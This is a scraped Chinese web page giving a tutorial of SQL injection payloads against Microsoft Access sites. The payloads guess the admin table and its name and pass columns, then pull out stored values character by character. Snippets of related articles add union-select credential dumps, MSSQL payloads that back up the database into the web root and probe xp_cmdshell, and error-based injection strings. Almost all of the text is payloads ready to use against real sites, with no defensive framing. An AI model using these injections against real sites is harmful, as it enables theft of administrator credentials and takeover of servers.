access注入语句

先猜表:and exists (select *from 表名) and ‘‘=‘

‘ and exists(select * from admin) and ‘‘=‘ 显示正常,说明有admin表。
下面来猜字段

‘ and exists(select 段名 from admin)and ‘‘=‘

‘ and exists(select name from admin) and ‘‘=‘   存在字段name

‘ and exists(select pass from admin) and ‘‘=‘存在字段pass

下面来猜字段的长度

‘ and(select top 1 len(name) from )>6 and ‘‘=‘  这个用二分法去猜
‘ and (select top 1 len(name) from admin)=5 and ‘‘=‘ name字段的长度是5
‘ and (select top 1 len(pass) from admin)=5 and ‘‘=‘pass字段长度也是5   应该没有加密过的吧

下面来猜name字段

‘ and(select top 1 asc(mid(name,1,1)) from admin)<97 and ‘‘=‘ 显示正常,就说明name第一个字符是a  第二个:

‘ and(select top 1 asc(mid(name,2,1)) from admin)<97 and ‘‘=‘

‘ and(select top 1 asc(mid(name,2,1)) from admin)=100 and ‘‘=‘

‘ and(select top 1 mid(name,1,5) from admin)=‘admin‘ and ‘‘=‘显示是正常,那就说明他的name字段应该是admin.密码同上一样去猜

access注入语句,布布扣,bubuko.com

时间: 2024-12-21 00:39:26

access注入语句的相关文章

access注入大全

access注入 access偏移注入 access搜索型注入 access登陆框注入 1.判断注入. and 1=1 and 1=2或者 -0 -1 看页面的变化 2. access注入. 联合查询order by 10and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from adminand 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin 3. access偏移注入. 条件须有i

连接access的语句

using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Linq;using System.Text;using System.Windows.Forms;using System.Data.OleDb; namespace accesslink{ public partial class Form1

Access sql语句创建表及字段类型(转)

http://www.cnblogs.com/hnyei/archive/2012/02/23/2364812.html 创建一张空表: Sql="Create TABLE [表名]" 创建一张有字段的表: Sql="Create TABLE [表名]([字段名1] MEMO NOT NULL, [字段名2] MEMO, [字段名3] COUNTER NOT NULL, [字段名4] DATETIME, [字段名5] TEXT(200), [字段名6] TEXT(200))

SQL注入语句 (很全)

1.返回的是连接的数据库名and db_name()>02.作用是获取连接用户名and user>03.将数据库备份到Web目录下面;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--4.显示SQL系统版本and 1=(select @@VERSION) 或and 1=convert(int,@@version)--5.判断xp_cmdshell扩展存储过程是否存在and 1=(SELECT count(*) FROM maste

C# 链接Sql和Access数据库语句

1.sql数据库: 1.1.链接数据语句:server=localhost;database=Data; uid=sa;pwd=123; 或 Data Source=localhost;DataBase=Data;Uid=sa;Pwd=123; 1.2.代码链接数据库: SqlConnectionStringBuilder csbuilder = new SqlConnectionStringBuilder(); csbuilder.DataSource = "localhost";/

access注入

前面有自己总结详细的mysql注入,自己access注入碰到的比较少,虽然比较简单,但是这里做一个总结 union联合查询法: 因为union前后字段数相同,所以可以先用order by 22 使查询结果按列序排序,确定当前有多少列,顺便直接爆出显示位 逐字猜解法: 查表:and exists (select * from 表名) 查列:and exists (select 列名 from 表名) //存在就返回正常页面,不存在就报错 查数据:1.确定此条数据字段(列名)长度 2.确定asc数据

SQL报错注入的12个函数及sql注入语句

转来的 侵删 1.通过floor报错,注入语句如下: and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.通过ExtractValue报错,注入语句如下: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tab

MSSQL注入语句

(1)                                                                                  判断数据库类型:                                                                                   Access:  aNd aSc(cHr(97))=97 and exists(select id from MSysAccessObjects)

渗透常用手工SQL注入语句合集

1.判断有无注入点; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) -判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个and 0<(select count(*) from admi